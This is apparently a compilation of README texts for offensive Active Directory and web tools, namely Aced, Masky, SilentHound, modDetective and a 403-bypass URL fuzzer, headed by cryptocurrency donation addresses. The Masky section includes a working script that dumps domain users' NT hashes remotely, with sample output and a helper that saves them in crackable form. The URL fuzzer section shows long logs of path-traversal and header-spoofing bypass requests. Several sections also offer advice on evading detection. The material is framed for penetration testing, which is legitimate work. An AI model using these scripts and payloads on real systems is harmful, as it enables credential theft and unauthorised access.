ZEC: zs13zdde4mu5rj5yjm2kt6al5yxz2qjjjgxau9zaxs6np9ldxj65cepfyw55qvfp9v8cvd725f7tz7
ETH: 0xef3cF1Eb85382EdEEE10A2df2b348866a35C6A54
BTC: 15umRZXBzgUacwLVgpLPoa2gv7MyoTrKat
Aced is a tool to parse and resolve a single targeted Active Directory principal's DACL. Aced will identify interesting inbound access allowed privileges against the targeted account, resolve the SIDS of the inbound permissions, and present that data to the operator. Additionally, the logging features of pyldapsearch have been integrated with Aced to log the targeted principal's LDAP attributes locally which can then be parsed by pyldapsearch's companion tool BOFHound to ingest the collected data into BloodHound.
I wrote Aced simply because I wanted a more targeted approach to query ACLs. Bloodhound is fantastic, however, it is extremely noisy. Bloodhound collects all the things while Aced collects a single thing providing the operator more control over how and what data is collected. There's a phrase the Navy Seals use: "slow is smooth and smooth is fast" and that's the approach I tried to take with Aced. The case for detection is reduced by only querying for what LDAP wants to tell you and by not performing an action known as "expensive ldap queries". Aced has the option to forego SMB connections for hostname resolution. You have the option to prefer LDAPS over LDAP. With the additional integration with BloodHound, the collected data can be stored in a familiar format that can be shared with a team. Privilege escalation attack paths can be built by walking backwards from the targeted goal.
Thanks to the below for all the code I stole:
@_dirkjan
@fortaliceLLC
@eloygpz
@coffeegist
@tw1sm
└─# python3 aced.py -h
_____
|A . | _____
| /.\ ||A ^ | _____
|(_._)|| / \ ||A _ | _____
| | || \ / || ( ) ||A_ _ |
|____V|| . ||(_'_)||( v )|
|____V|| | || \ / |
|____V|| . |
|____V|
v1.0
Parse and log a target principal's DACL.
@garrfoster
usage: aced.py [-h] [-ldaps] [-dc-ip DC_IP] [-k] [-no-pass] [-hashes LMHASH:NTHASH] [-aes hex key] [-debug] [-no-smb] target
Tool to enumerate a single target's DACL in Active Directory
optional arguments:
-h, --help show this help message and exit
Authentication:
target [[domain/]username[:password]@]<address>
-ldaps Use LDAPS instead of LDAP
Optional Flags:
-dc-ip DC_IP IP address or FQDN of domain controller
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid
credentials cannot be found, it will use the ones specified in the command line
-no-pass don't ask for password (useful for -k)
-hashes LMHASH:NTHASH
LM and NT hashes, format is LMHASH:NTHASH
-aes hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-debug Enable verbose logging.
-no-smb Do not resolve DC hostname through SMB. Requires a FQDN with -dc-ip.
In the below demo, we have the credentials for the corp.local\lowpriv account. By starting enumeration at Domain Admins, a potential path for privilege escalation is identified by walking backwards from the high value target.
And here's how that data looks when transformed by bofhound and ingested into BloodHound.
Masky is a python library providing an alternative way to remotely dump domain users' credentials thanks to an ADCS. A command line tool has been built on top of this library in order to easily gather PFX, NT hashes and TGT on a larger scope.
This tool does not exploit any new vulnerability and does not work by dumping the LSASS process memory. Indeed, it only takes advantage of legitimate Windows and Active Directory features (token impersonation, certificate authentication via Kerberos & NT hash retrieval via PKINIT). A blog post was published to detail the implemented techniques and how Masky works.
Masky's source code is largely based on the amazing Certify and Certipy tools. I really thank their authors for the research regarding offensive exploitation techniques against ADCS (see Acknowledgments section).
The Masky python3 library and its associated CLI can be simply installed via the public PyPi repository as follows:
pip install masky
The Masky agent executable is already included within the PyPi package.
Moreover, if you need to modify the agent, the C# code can be recompiled via the Visual Studio project located in agent/Masky.sln. It requires .NET Framework 4 to be built.
Masky has been designed as a Python library. Moreover, a command line interface was created on top of it to ease its usage during pentest or RedTeam activities.
For both usages, you first need to retrieve the FQDN of a CA server and its CA name deployed via an ADCS. This information can be easily retrieved via the certipy find option or via the Microsoft built-in certutil.exe tool. Make sure that the default User template is enabled on the targeted CA.
Warning: Masky deploys an executable on each target via a modification of the existing RasAuto service. Despite the automated roll-back of its initial ImagePath value, an unexpected error during Masky's runtime could skip the cleanup phase. Therefore, do not forget to manually reset the original value in case of such an unwanted stop.
The following demo shows a basic usage of Masky by targeting 4 remote systems. Its execution allows collecting NT hashes, CCACHE and PFX files of 3 distinct domain users from the sec.lab testing domain.
Masky also provides options that are commonly provided by such tools (thread number, authentication mode, targets loaded from files, etc. ).
__ __ _
| \/ | __ _ ___| | ___ _
| |\/| |/ _` / __| |/ / | | |
| | | | (_| \__ \ <| |_| |
|_| |_|\__,_|___/_|\_\__, |
v0.0.3 |___/
usage: Masky [-h] [-v] [-ts] [-t THREADS] [-d DOMAIN] [-u USER] [-p PASSWORD] [-k] [-H HASHES] [-dc-ip ip address] -ca CERTIFICATE_AUTHORITY [-nh] [-nt] [-np] [-o OUTPUT]
[targets ...]
positional arguments:
targets Targets in CIDR, hostname and IP formats are accepted, from a file or not
options:
-h, --help show this help message and exit
-v, --verbose Enable debugging messages
-ts, --timestamps Display timestamps for each log
-t THREADS, --threads THREADS
Threadpool size (max 15)
Authentication:
-d DOMAIN, --domain DOMAIN
Domain name to authenticate to
-u USER, --user USER Username to authenticate with
-p PASSWORD, --password PASSWORD
Password to authenticate with
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters.
-H HASHES, --hashes HASHES
Hashes to authenticate with (LM:NT, :NT or :LM)
Connection:
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-ca CERTIFICATE_AUTHORITY, --certificate-authority CERTIFICATE_AUTHORITY
Certificate Authority Name (SERVER\CA_NAME)
Results:
-nh, --no-hash Do not request NT hashes
-nt, --no-ccache Do not save ccache files
-np, --no-pfx Do not save pfx files
-o OUTPUT, --output OUTPUT
Local path to a folder where Masky results will be stored (automatically creates the folder if it does not exist)
Below is a simple script using the Masky library to collect secrets of running domain user sessions from a remote target.
from masky import Masky
from getpass import getpass

def dump_nt_hashes():
    # Define the authentication parameters
    ca = "srv-01.sec.lab\\sec-SRV-01-CA"
    dc_ip = "192.168.23.148"
    domain = "sec.lab"
    user = "askywalker"
    password = getpass()

    # Create a Masky instance with these credentials
    m = Masky(ca=ca, user=user, dc_ip=dc_ip, domain=domain, password=password)

    # Set a target and run Masky against it
    target = "192.168.23.130"
    rslts = m.run(target)

    # Check if Masky successfully hijacked at least one user session
    # or if an unexpected error occurred
    if not rslts:
        return False

    # Loop over the MaskyResults object to display hijacked users
    # and retrieve their NT hashes
    print(f"Results from hostname: {rslts.hostname}")
    for user in rslts.users:
        print(f"\t - {user.domain}\\{user.name} - {user.nt_hash}")

    return True

if __name__ == "__main__":
    dump_nt_hashes()
Its execution generates the following output.
$> python3 .\masky_demo.py
Password:
Results from hostname: SRV-01
- sec\hsolo - 05ff4b2d523bc5c21e195e9851e2b157
- sec\askywalker - 8928e0723012a8471c0084149c4e23b1
- sec\administrator - 4f1c6b554bb79e2ce91e012ffbe6988a
A MaskyResults object containing a list of User objects is returned after a successful execution of Masky. Please look at the masky\lib\results.py module to check the methods and attributes provided by these two classes.
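For instance, using only the attributes already shown above (users, domain, name, nt_hash), a short helper could persist the collected hashes in a crackable user:hash format; the function name and output path below are arbitrary:
```python
# Assumes `rslts` is the object returned by m.run(target), as in the script above
def save_nt_hashes(rslts, path="nt_hashes.txt"):
    # Append one "DOMAIN\user:hash" line per hijacked session
    with open(path, "a") as f:
        for user in rslts.users:
            f.write(f"{user.domain}\\{user.name}:{user.nt_hash}\n")
```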
Quietly enumerate an Active Directory Domain via LDAP parsing users, admins, groups, etc. Created by Nick Swink from Layer 8 Security.
sudo python3 -m pip install --user pipenv
git clone https://github.com/layer8secure/SilentHound.git
cd silenthound
pipenv install
This will create an isolated virtual environment with the dependencies needed for the project. To use the project you can either open a shell in the virtualenv with pipenv shell or run commands directly with pipenv run.
This method is not recommended because python-ldap can cause many dependency errors.
Install dependencies with pip:
python3 -m pip install -r requirements.txt
python3 silenthound.py -h
$ pipenv run python silenthound.py -h
usage: silenthound.py [-h] [-u USERNAME] [-p PASSWORD] [-o OUTPUT] [-g] [-n] [-k] TARGET domain
Quietly enumerate an Active Directory environment.
positional arguments:
TARGET Domain Controller IP
domain Dot (.) separated Domain name including both contexts e.g. ACME.com / HOME.local / htb.net
optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
LDAP username - not the same as user principal name. E.g. Username: bob.dole might be 'bob
dole'
-p PASSWORD, --password PASSWORD
LDAP password - use single quotes 'password'
-o OUTPUT, --output OUTPUT
Name for output files. Creates output files for hosts, users, domain admins, and descriptions
in the current working directory.
-g, --groups Display Group names with user members.
-n, --org-unit Display Organizational Units.
-k, --keywords Search for key words in LDAP objects.
A lightweight tool to quickly and quietly enumerate an Active Directory environment. The goal of this tool is to get a Lay of the Land whilst making as little noise on the network as possible. The tool will make one LDAP query that is used for parsing, and create a cache file to prevent further queries/noise on the network. If no credentials are passed it will attempt anonymous BIND.
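To illustrate the idea (this is not SilentHound's own code), a single broad LDAP query with an anonymous bind can be sketched with the ldap3 library; the target IP and base DN below are placeholders:
```python
from ldap3 import ALL, SUBTREE, Connection, Server

TARGET = "10.10.10.100"     # Domain Controller IP (placeholder)
BASE_DN = "DC=acme,DC=com"  # Derived from the dot-separated domain name

# Anonymous simple bind: no credentials supplied
server = Server(TARGET, get_info=ALL)
conn = Connection(server, auto_bind=True)

# One broad query; the results can then be parsed and cached locally
# instead of issuing further requests on the network
conn.search(BASE_DN, "(objectClass=*)", search_scope=SUBTREE,
            attributes=["name", "description", "memberOf"])
print(f"Retrieved {len(conn.entries)} objects")
```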
Using the -o flag will result in output files for each section that would normally be printed to stdout. The files created using all flags will be:
-rw-r--r-- 1 kali kali 122 Jun 30 11:37 BASENAME-descriptions.txt
-rw-r--r-- 1 kali kali 60 Jun 30 11:37 BASENAME-domain_admins.txt
-rw-r--r-- 1 kali kali 2620 Jun 30 11:37 BASENAME-groups.txt
-rw-r--r-- 1 kali kali 89 Jun 30 11:37 BASENAME-hosts.txt
-rw-r--r-- 1 kali kali 1940 Jun 30 11:37 BASENAME-keywords.txt
-rw-r--r-- 1 kali kali 66 Jun 30 11:37 BASENAME-org.txt
-rw-r--r-- 1 kali kali 529 Jun 30 11:37 BASENAME-users.txt
For additional feature requests please submit an issue and add the enhancement tag.
modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. This can be used in CTFs to pinpoint where escalation and attack vectors may exist.
To see the tool in its most useful form, try running the command as follows: python3 modDetective.py -i /usr/share,/usr/lib,/lib. This will ignore the /usr/lib, /usr/share, and /lib directories, which tend not to have anything of interest. Also note that by default the "dynamic" directories are ignored (/proc, /sys, /run, /snap, /dev).
modDetective is very elementary in how it operates. It simply walks the filesystem, with bounds determined by user-specified options (-i is for ignore, meaning the tool will walk every directory EXCEPT the ones specified in the -i option, and -e is for exclusive, meaning the tool will ONLY walk the directories specified). While walking, it picks up the modification time of each file, then orders these modification times to output them chronologically.
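Conceptually, that walk-and-sort core reduces to something like the following sketch (not the tool's exact code):
```python
import os
import time

def chronologize(root, ignore=("/proc", "/sys", "/run", "/snap", "/dev")):
    """Walk `root`, collect file mtimes, and print them oldest-first."""
    entries = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune ignored directories in place so os.walk never descends into them
        dirnames[:] = [d for d in dirnames
                       if not os.path.join(dirpath, d).startswith(ignore)]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                entries.append((os.path.getmtime(path), path))
            except OSError:
                continue  # broken symlinks, permission errors, etc.
    # Order by modification time to reconstruct recent activity
    for mtime, path in sorted(entries):
        print(time.ctime(mtime), path)

chronologize("/home")
```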
Additionally, in the output you will potentially see some files highlighted red. These files are denoted as "Indicators of User Activity," since recent modifications to these files indicate that a user is currently active. As of now, these files include .swp files, .bash_history, .python_history and .viminfo. This list will be extended as I brainstorm more files that indicate present user activity.
modDetective currently works only with python3; python2 compatibility will be completed shortly (hence the lack of f-strings). Standard libraries should be fine.
Tool that tests MANY url bypasses to reach a 40X protected page.
If you wonder why this code is nothing but a dirty curl wrapper, here's why: this is surprisingly hard to achieve in Python without losing all of the lib goodies like parsing, ssl/tls encapsulation and so on. So, be like me, use curl as a backend; it's gonna be just fine.
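In other words, the tool generates many curl command lines and compares their status codes and response sizes. A rough sketch of that loop (with the mutation list trimmed to two examples) could look like this:
```python
import subprocess

URL = "http://127.0.0.1/juicy_403_endpoint/"

# Two representative mutations; the real tool generates many more variants
variants = [
    ["curl", "-sS", "-kgi", "--path-as-is",
     "-w", r"\nStatus: %{http_code}, Length: %{size_download}", URL],
    ["curl", "-sS", "-kgi", "--path-as-is",
     "-w", r"\nStatus: %{http_code}, Length: %{size_download}",
     "-H", "X-Forwarded-For: 127.0.0.1", URL],
]

for cmd in variants:
    # curl handles TLS, raw paths, and header tricks; we only collect output
    out = subprocess.run(cmd, capture_output=True, text=True, timeout=10)
    if out.stdout:
        print(out.stdout.splitlines()[-1])  # the "Status: ..., Length: ..." line
```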
# Deps
sudo apt install -y bat curl virtualenv python3
# Tool
virtualenv -p python3 .py3
source .py3/bin/activate
pip install -r requirements.txt
./bypass-url-parser.py --url "http://127.0.0.1/juicy_403_endpoint/"
2022-05-10 15:54:03 work bup[738125] INFO === Config ===
2022-05-10 15:54:03 work bup[738125] INFO debug: False
2022-05-10 15:54:03 work bup[738125] INFO url: http://thinkloveshare.com/api/jolokia/list
2022-05-10 15:54:03 work bup[738125] INFO outdir: /tmp/tmp48drf_ie-bypass-url-parser
2022-05-10 15:54:03 work bup[738125] INFO threads: 20
2022-05-10 15:54:03 work bup[738125] INFO timeout: 2
2022-05-10 15:54:03 work bup[738125] INFO headers: {}
2022-05-10 15:54:03 work bup[738125] WARNING Stage: generate_curls
2022-05-10 15:54:03 work bup[738125] INFO base_url: http://thinkloveshare.com
2022-05-10 15:54:03 work bup[738125] INFO base_path: /api/jolokia/list
2022-05-10 15:54:03 work bup[738125] WARNING Stage: run_curls
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'CONNECT' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'GET' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'LOCK' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'OPTIONS' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'PATCH' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'POST' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'POUET' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'PUT' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'TRACE' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'TRACK' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'UPDATE' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: 0.0.0.0' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: 127.0.0.1' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: localhost' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: norealhost' 'http://thinkloveshare.com/api/jolokia/list'
[...]
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%252f%252f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%26//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%20%23//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%23//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3b%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3b%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3f///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/..//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b//%2f..///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2e.//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2e%2e/..%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2f%2f..///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%09//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f..//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e.//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e%2e//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e%2e%2f%2e%2e%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f%23//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'POUET' 'http://thinkloveshare.com//api/jolokia//%3f%3f//list'
